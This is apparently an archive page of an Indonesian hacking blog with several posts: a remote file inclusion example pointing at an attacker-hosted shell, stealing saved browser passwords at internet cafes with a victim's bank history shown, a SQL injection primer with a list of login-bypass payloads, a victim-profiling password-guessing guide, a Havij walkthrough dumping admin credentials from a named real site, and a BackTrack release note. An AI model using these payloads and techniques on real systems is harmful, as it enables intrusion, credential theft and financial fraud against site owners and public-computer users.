http://target.com/Commence/user/phase/

phasebase.php?php_root_path=http://penyerang.com/shell.txt?

TINGKAT BAHAYA
————–
Serangan Remote File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.

APA YANG HARUS DILAKUKAN
————————-
Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yang anda kelola.Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal.

Artikel diatas penulis tulis berdasarkan pengetahuan yang penulis miliki, apabila terdapat kesalahan dimohon masukan dan pencerahannya.

Referensi:

http://www.milw0rm.com

Read more


AutoComplete Kemudahan atau kerawanan

Main#
Adanya fitur AutoComplete ataupun password storage di berbagai macam browser saat ini
merupakan terobosan inovatif, mengingat kemampuan seseorang dalam menghapal. Dengan
fitur ini pula kita dapat mengehemat waktu mengetik dan mengisi kolom username dan password.
Pernahkah anda bermain di suatu kafe internet atau kantor, dan membuka halaman login dari
Email anda mengetik atau menekan 1 huruf depan dari username anda browser saat itu juga langsung
menampilkan pilihan username-username yang sudah pernah diinputkan?? Bila anda memakai komputer
dengan single user mungkin tak masalah, lalu bagaimana bila multiuser?? Ada kemungkinan username
bahkan password anda dapat diambil oleh orang lain.
Berbekal aplikasi password recovery kita dapat mengambil dan membongkar username-password yang
tersimpan ini. Penulis menggunakan Passcape Internet Explorer Password Recovery (www.passcape.com).
Kebetulan Browser di warnet penulis menggunakan Internet Explorer (selanjutnya disingkat menjadi IE saja)
yang fitur AutoComplete sedang menyala.
Install Passcape Internet Explorer Password Recovery (selanjutnya disingkat menjadi PIEPR saja),
lalu pilih metode Recovery yang akan dijalankan :

* AUTOMATIC : akan membuka Password yang tersimpan secara otomatis
* MANUAL : akan membuka Password melalui file ntuser.dat, biasanya di C:\Documents and Settings\%nama_user%
* CONTENT ADVISOR : akan meng-Edit status dan password dari Internet Explorer Content Advisor
* ASTERISKS PASSWORDS : akan membuka “tabir” karakter ‘*’ atau asterik dari kolom password
* MISCELLANEOUS : akan menampilkan macam-macam cookie, cache atau URL yang disimpan oleh IE

Kita akan menggunakan fitur AUTOMATIC untuk membuka password yang tersimpan. Klik Next>> lalu PIEPR akan
menampilkan sejumlah kolom yang berisi keterangan resource IE apa yang dapat dibuka beserta username dan password.

Contoh hasil Recovery PIEPR:

<<>>

Created by Passcape Internet Explorer Password Recovery

IE resource type : IE autocomplete passwords
Resource name : https://ib.bankapajah.co.id/retail/Login.do
User name/Value : xxxxxxx
Password : xxxxxxx

IE resource type : Identity passwords
Resource name : Main Identity
User name/Value :
Password :

PIEPR v1.4.1.170
09-15-2006 10:23:08

Diatas merupakan username dan password dari sebuah session login internet banking di salah satu Bank swasta nasional.
Dapat dibayangkan apa yg terjadi bila kita mempunyai akses untuk melihat, mengubah bahkan mengambil uang dari akun tersebut.
Berikut contoh hasil pemeriksaan saldo dan histori transaksi dari akun tersebut:

NAMA_ORANG_YANG_KENA_TEPU
15 Sep 2006, 12:53:40 HELP

POSISI SALDO

Nomor Transaksi : 0609150069978
Nomor Rekening : xxxxxxxxxxxxx
Jenis Rekening : Tabungan
Tanggal – Jam : 15 September 2006 – 12:53 PM
Posisi Saldo : Rp. 3.352.512,44

HISTORI TRANSAKSI

Nomor Transaksi : 0609150070131
Nomor Rekening : xxxxxxxxxxxxx Rp.
Jenis Rekening : Tabungan
Periode Transaksi : 14 Aug 2006- 15 Sep 2006
Tampilkan Berdasarkan : Tanggal
Urutkan Berdasarkan : Mulai dari yang kecil

Tanggal Keterangan Transaksi Debet Kredit
14/08/2006 VE POS SA
21765315 /0000186584/VAP-SARINAH THA 160.000,00 0,00
14/08/2006 SA ATM PLN PAYM DR
41100046011547100899423
S1AD00FW /6765 /ATM-SPBU P KLP 150.115,00 0,00
14/08/2006 SA ATM PLN PAYM DR
41100046011547100899423
S1AD00FW /6765 /ATM-SPBU P KLP 2.500,00 0,00
15/08/2006 SA ATM Withdrawal
S1AD00FW /7581 /ATM-SPBU P KLP 1.000.000,00 0,00
15/08/2006 INW.CN-SKN CR SA-MCS
CHEVRON INDONESIA COMPANY – 032 0,00 2.234.825,00
15/08/2006 VE POS SA
00019333 /0000198403/VAP-TOKO GUNUNG 101.000,00 0,00
17/08/2006 SA ATM Withdrawal
S1AD00FW /7878 /ATM-SPBU P KLP 1.000.000,00 0,00
19/08/2006 SA ATM Withdrawal
S1AP125I /3170 /ATM-TMN GALAXY1 500.000,00 0,00
20/08/2006 VE POS SA
61029923 /0000292379/VAP-MDS (ARION 195.000,00 0,00
22/08/2006 SA ATM Withdrawal
S1AP1449 /6920 /ATM-KC T AGUNG1 1.000.000,00 0,00
23/08/2006 SA ATM Withdrawal
S1AM141Z /9388 /ATM-BDR JUANDA2 500.000,00 0,00
26/08/2006 SA ATM Withdrawal
S1AP12EQ /9678 /ATM-METROPOLITA 100.000,00 0,00
27/08/2006 SA ATM Withdrawal
S1AD00FW /1633 /ATM-SPBU P KLP 150.000,00 0,00
28/08/2006 INW.CN-SKN CR SA-MCS
CHEVRON INDONESIA COMPANY – 031 0,00 13.866.238,00
31/08/2006 Bunga Rekening 0,00 14.740,63
31/08/2006 Biaya Administrasi 7.000,00 0,00
02/09/2006 SA OB SA No Book
Transfer untuk September
1250005534326 5.000.000,00 0,00
02/09/2006 SA OB SA No Book
Transfer untuk September 1.000,00 0,00
02/09/2006 INT-BK CCPYM CA/SA
4137180305168351 300.000,00 0,00
06/09/2006 INT-BK CCPYM CA/SA
4137180305168351 2.543.987,00 0,00
06/09/2006 INT-B DR SA BILL PMT
030208160140021008226614 170.804,00 0,00
06/09/2006 SA INT PLN PAYM DR
41000046014547100899423 150.115,00 0,00
06/09/2006 SA INT PLN PAYM DR
41000046014547100899423 2.500,00 0,00
06/09/2006 SA OB SA No Book
untuk bni chay, thanks
1250005534326 2.500.000,00 0,00
06/09/2006 SA OB SA No Book
untuk bni chay, thanks 1.000,00 0,00

Saldo Awal : 2.771.729,81
Total Kredit : 16.115.803,63
Total Debet : 15.535.021,00
Saldo Akhir : 3.352.512,44

Waw!!! kita bisa melihat semua transaksi akun tersebut. Apa yang bisa kita lakukan setelah itu? kita bisa melakukan
phising ataupun spamming dengan mengambil data-data penting lainnya, seperti :

UBAH ALAMAT E-MAIL

Nama : NAMA_ORANG_YANG_KENA_TEPU
Tanggal Lahir : 29 February 1900
Alamat E-Mail : KENA_TEPU@mailboongan.com

Solusi#
Bisa kita bayangkan akibat terburuk dari password stealing seperti itu, transfer dana tanapa kita duga, pengambil-alihan
rekening, pengubahan password, hingga pencurian data-data penting kita. Bagaimana kita menghindari hal tersebut?
Aplikasi pembersih Cookie atau cache Browser dapat kita manfaatkan, bahkan dari IE pun sudah ada fitur ini.

> Buka browser IE anda, pilih Tools pada toolbar.
> Pilih Internet Options
> Klik Delete Cookies untuk menghapus cookies anda, Delete Files untuk menghapus file-file temporer dan Clear History untuk
membersihkan sisa-sisa “perjalanan” anda selama browsing.

Bila fitur tersebut dirasa kurang memadai, maka anda dapat menggunakan aplikasi third party, seperti cookies washer atau sejenisnya.
Selain ancaman Password recovery seperti PIEPR, ada aplikasi keylogger yang dapat mencatat semua ketikan anda. Untuk mengakali hal ini,
anda dapat menggunakan fitur on Screen-keyboard Windows.

> Buka menu START, pilih ALL Programs lalu Accessories
> Lalu pilih On-Screen Keyboard.

Kesimpulan#
Pencurian password dan username dalam komputer publik merupakan hal yang wajar mengingat kelemahan sistem yang ada.
Fitur AutoComplete yang disediakan oleh Browser saat ini dapat menjadi bumerang bagi pemakainya apabila tidak berhati-hati
dalam pemakaiannya. Aplikasi Password Recovery seperti PIEPR dapat menampilkan semua username dan password yang pernah disimpan
selama kegiatan Browsing. Lakukan pembersihan Cookies dan History anda setiap kali selesai browsing agar menghindari penyalahgunaan
hak akses.

Penutup#
Penulis tidak bermaksud untuk mengajak pembaca menjadi seorang “PENCURI”, tetapi prihatin atas kurangnya informasi dan kesadaran
dari pengguna komputer publik dalam menjaga rahasia pribadinya. Dengan artikel sederhana (mungkin jelek ) ini penulis ingin membawa
pembaca untuk lebih waspada terhadap teknik-teknik pencurian data rahasia. Semoga artikel ini bermanfaat bagi kita semua. Amien.

Read more


Dasar Dasar SQL injection

Sebelum membahas tentang sql injection pertama-tama saya akan menerangkan apa itu sql injection dan kenapa bisa terjadi.
Sebenernya SQL injection terjadi ketika attacker bisa meng insert beberapa SQL statement ke ‘query’ dengan cara manipulasi data input ke applikasi tsb.
Diantara DB format seperti PHP + MySQL dan ASP + MSACCESS atau dengan MySql ,disini saya cuma akan membahas tentang ASP+MsSql yang udah dicoba pada IIS 5 dan beberapa sql injection pada url.


Biasa Sql Injection dilakukan pada login page pada asp seperti di :
admin\login.asp
login.asp
Jadi yang akan menjadi target itu page tersebut ,sekarang kita mulai aja dengan dasar-dasar sql injection.
Biasanya di sql statment
select id, user_name, password from user
maksudnya perintah diatas menghasilkan data id,user_name dan password pada table user.
Bisanya pada login page dengan mengunakan statment result setnya sebagai berikut :
select id, user_name,password from user where name = ‘echo’ and password=’password’
Pada IIS dan ASP apabila terdapat kesalahan sintax script akan diberi tau dan ditampilkan di browser Server: Msg 170, Level 15, State 1, Line 1 Line 1: Incorrect syntax near ‘jopi’ SQL atau “Structured Query Language” seharusnya tidak menyentuh system calls. Tetapi tidak dengan MSSQL.
Nah, ga tau kenapa karakter single quote ‘breaks out’ dari delimiter nya SQL Jadi kalau misal ada inputan
User: echo’;drop table user–
dan akibatnya akan fatal , dan artinya adalah kita menghapus table user dan akan kosong deh tuh loginya :D oh iya ‘–’ merukapan mark nya MSSQL, jadi perintah selanjutnya ga di execute.Sekarang untuk lebih jelasnya kita secara langsung pada login script sepertiinput login + password. Nama field nya ‘login’ dan ‘pass’. dan SQL nya di asp:
var sql = select * from users where username=’”+login+”‘ and password=’”+pass”‘”;
coba kalau ada inputan: login: ‘;drop table users– pass: chfn (*wink* negative)pasti ke drop tuh table usersAduh pada pusing ya , gini deh cara gampangnya adn kita lupakan yang diatas :P kita langsung praktek aja.
Coba cari disitus-situs yang menggunakan asp dan MsSql sebagai DB nya, lalu cari login.asp atau admin\login.asp.
Kalau udah dapet masukin nich variable sql nya
user:admin
pass:’ or 1=1–
Ingat kita disini hanya coba-coba kali aja dba nya ga pinter
atau :
user:’ or 1=1–
admin:’ or 1=1–
Mas , ga bisa nich gimana ya ?Inget sekarang rata-rata para admin pada pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisabuat sendiri script dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter pada db nya . Untuk test apakah suatu page mempunyai vulnerable , gini caranya :Kalian pernh melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :
http://vivtim/index.asp?id=10
Selain kita test dengan login page diatas tadi , kita test dalam melakukan sedikit tambahanpada addressnya seperti memasukan : test’1=1–
menjadi http://victim/index.asp?id=test’1=1
Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page targetlalu kita tamhankan hidden field pada source tersebut sebagai contoh :


Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username.ingat script ini ditamhakna pd script yg sudah kalian download dr target .
Variable ‘ or 1=1–
Mungkin pada bertanya-tanya kenapa mengunakan variable ‘or 1=1– dan sangat penting.Lihat contohpada sebuah web tertulis http://victim/index.asp?category=laptopDalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .Kalau ditulis dalam script ASP maka akan menjadi :
v_cat = request(“category”)
sqlstr=”SELECT * FROM product WHERE PCategory=’” & v_cat & “‘”
set rs=conn.execute(sqlstr)
Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi
SELECT * FROM product WHERE PCategory=’laptop’
lalu apa hub dengan ‘or 1=1—
coba kalau kita ganti http://victim/index.asp?category=laptop menjadi
http://victim/index.asp?category=laptop’or 1=1–
Kita lihat varible v_cat sekarang menjadi laptop’or 1=1– lalu dalam SQL query nya menjadi
SELECT * FROM product WHERE PCategory=’laptop’ or 1=1–’
artinya v_cat mendapatkan masukan berupa varibale laptop atau var 1=1(kosong) yang menyebabkanSql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkankita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda — merupakan mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login pageKita bisa masuk kedalam login page tanpa password dan user name :d.Kemungkinan-kemungkinan variable lainya :
or 1=1–
” or 1=1–
or 1=1–
‘ or ‘a’='a
” or “a”=”a
‘) or (‘a’='a
‘ or 0=0 –
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”a


by Skutengboy

Read more


Seni Menebak password

Kita akan membahas teknik Blind Guessing. Teknik ini merupakan dasar dari DictionaryAttack yaitu kita mencoba menebak kemungkinan terbesar dari password. Setelah kita berhasil menyusun kemungkinan tebakan password, kita bisa menggunakan Brute Force Tool seperti Brutus. Para user yg cerdik akan menggunakan password yg sangat sulit ditebak. Bahkan menggunakan kombinasi yg sangat panjang termasuk didalamnya karakter alfanumerik maupun karakter khusus..
Sebagai pertimbangan, gunakan rumus berikut untuk mendapatkan jumlah kemungkinan kombinasi password yg mungkin :

Z=X^Y

untuk :

X = jumlah karakter kombinasi

Y = jumlah karakter password

Z = jumlah kombinasi karakter password

^ = tanda pangkat

Contoh :

Karakter kombinasi adalah “hanya” angka yaitu : (1,2,3,4,5,6,7,8,9,0). Jadi jumlah karakter = 10
Misalnya password yg digunakan hanya 2 karakter (37) maka jumlah karakter password = 2
Maka jumlah kombinasi password yg mungkin terjadi adalah 10^2 = 100

Bisa anda bayangkan jika password berupa kombinasi karakter alfanumerik dan karakter khusus selain panjangnya password, akan banyak sekali kombinasinya. Namun disitulah tatangannya. Sebelum melakukan Blind Guessing, pastikan anda telah mendapatkan informasi tentang korban, misalnya nama, nama org tua, tanggal lahir, nama kekasih dan lainnya. Dapatkan sebanyak mungkin, hal ini akan sangat membantu.

1. Kombinasi Umum
Beberapa user yg malas suka menggunakan kombinasi yg mudah diingat dan sederhana, contoh :

1234567890

0987654321

zxcvbnm

mnbvcxz

asdfghjkl

lkjhgfdsa

qwertyuiop

poiuytrewq

Saya rasa tidak sulit utk menemukan cara mengetiknya.

2. Kombinasi ala Hacker

Hacker suka sekali menggunakan angka menggantikan huruf, contoh : h4ck3r, 70mi, m0b1 dan lainnya. Kemungkinan kombinasi tergantung menurut nama dan beberapa kriteria lain seperti nama kekasih, hobi, nama situs/layanan yg digunakan dan lainnya. contoh :

Nama korban : Master Hacker

Kemungkinan : m4st3r_h4ck3r, m4st3r, h4ck3r

3. Berhubungan dgn nama

Nama : John Doe

Kemungkinan : doe, jdoe, johndoe, jd

4. Berhubungan dgn handle

Nama : John Doe

Handle : tikus

Kemungkinan : jdtikus, tikusdoe, tikusjohn, tikus, rat, doetikus

5. Berhubungan dgn nama kekasih/teman

Nama : John Doe

Kekasih/teman : Fitri

Kemungkinan : johnlovefitri, fitriloveyou, jdf, johnfitri

6. Berhubungan dgn nomor telepon

Nama : John Doe

No.Telepon : 12345

Kemungkinan : jd12345, john12345, doe54321

7. Berhubungan dgn layanan/service yg digunakan

Nama : John Doe

Service : email

Kemungkinan : johnemail, jdemail, doemail, mymail, myemail

Bisa kita lihat dari kombinasi diatas yg sebenarnya masih sangat banyak sekali kemungkinan yg terjadi. Namun beberapa yg cukup akurat adalah kombinasi umum dan kombinasi ala hacker. Sengaja saya sebut kombinasi umum karena dalam banyak review dgn rekan2 dan beberapa kenalan ternyata kombinasi (zxcvbnm) sangat dikenal. Tidak lah begitu sulit utk menghafalnya dan pada dasarnya memang tidak perlu dihafalkan karena memiliki susunan yg unik. Sebagian besar cenderung menggunakan hal2 yg sederhana.
Kombinasi ala hacker juga sering saya jumpai. Dengan teknik sosial dan akses fisik, saya sering menemukan password dgn kombinasi seperti ini. Penggunaan kombinasi ini sangat sederhana dan mudah diingat.

Kombinasi ini sangat berhubungan dgn nama atau handle. Kembali kepada anda, sejauh mana kreatifitas anda, sebanyak apa informasi yg berhasil anda dapatkan akan sangat membantu akurasi penebakan password. Sebagai pengguna layanan dgn otentikasi yg membutuhkan password. Kita tidak pernah lepas dari masalah memilih password yg baik. Password yg baik hendaknya sulit ditebak, tidak berhubungan dgn diri kita atau org terdekat.

Read more


Havij v1.10

------------------------------
STEP 1 Inject Url Target
------------------------------
Masukan Url target di coloums paling atas lalu klik Analize


Lihat coloums pling bawah untuk mengetahui Vuln target & jumlah coloumn
pastekan url di browser dengan jumlah coloumn yang ada di Havij
teknik yang di gunakan disini (SQL injection ) untuk mencari username & password
contoh :
http://www.arenabola.com/?page=artikel&id=9+AND+1=2+union+select+1,2,3,group_concat(user,0x3a,pass),5,6,7,8,9,10,11,12+from+admin--

----------------------------------------------------------------------
STEP 2 Menghash Password apabila masih berbentuk MD5
------------------------------------------------------------------------
Pilih MD5 & masukan password yang akan d hash...lalu klik Start
Password akan di hash secara online oleh havij di 15 Situs Hash password
Hasil
----------------------------------------
STEP 3 Mencari Halaman admin
----------------------------------------
Msukan url target lalu pilih Find Admin

Alhamdulillah user/password dan halaman admin sudah ketemu....tinggal di upload shell'y .....
Ry klo ada yang salah - masih newbie Grin
Semoga bermanfaat Grin

Read more


Backtrack 3 Final

Ni dia distro Linux yang ditunggu2 versi Finalnya... Apalagi kalau bukan Backtrack.


Akhirnya datang juga..... Amiennn......



BackTrack adalah salah satu distribusi Linux Live popular yang fokus ditargetkan untuk masalah sekuriti sebagai 'Penetration Testing'. Versi 3 baru saja (2008-06-19) dirilis setelah ia sejak enam bulan (2007-12-14) berstatus beta. Perjalan cukup panjang selama 15 bulan sejak BackTrack 2 (2007-03-07) memastikan kematangan versi final ini.

Distro ini dibangun oleh Mati Aharoni dan Max Moser yang berkolaborasi dengan komunitas pengguna Backtrack di Remote-Exploit. Untuk Backtrack 3 Final ini terdapat 3 versi yaitu :

  • Versi CD Image, dengan nama file bt3-final.iso, dengan ukuran 695 MB.
  • Versi USB (tambahan), dengan nama file bt3final_usb.iso, dengan ukuran 784 MB.
  • Versi Vmware Image, dengan nama file BACKTRACK3_VMWare.rar, dengan ukuran 689 MB.

Untuk versi terbaru ini Backtrack tetap menggunakan desktop KDE dan Fluxbox, tanpa ada perubahan pada versi kernel yaitu kernel 2.6.21.5. Pada versi Bactrack 2 yang telah memuat lebih dari 300 security tool, untuk Bactrack 3 Final akan ditambahkan beberapa tool seperti: SAINT, Maltego v2.0 yang merupakan versi khusus untuk para pengguna Backtrack, spoonwep, fastrack dan banyak lagi, sedangkan Nessus tidak akan di sertakan dalam Backtrack 3 Final ini.

Release Bactrack 3 Final ini selain berisi tool terbaru dan updatenya, juga memperbaiki isu Dual core, kompatibilitas kartu Wireless yang disertai patch untuk melakukan injeksi, peningkatan konfigurasi Xorg, update repositori exploit serta update framework metasploit, melakukan booting dari jaringan (untuk versi USB), dan sebagainya.

Untuk mendownload semua ISOnya, silakan meluncur ke alamat ini:

http://www.remote-exploit.org/backtrack_download.html

Read more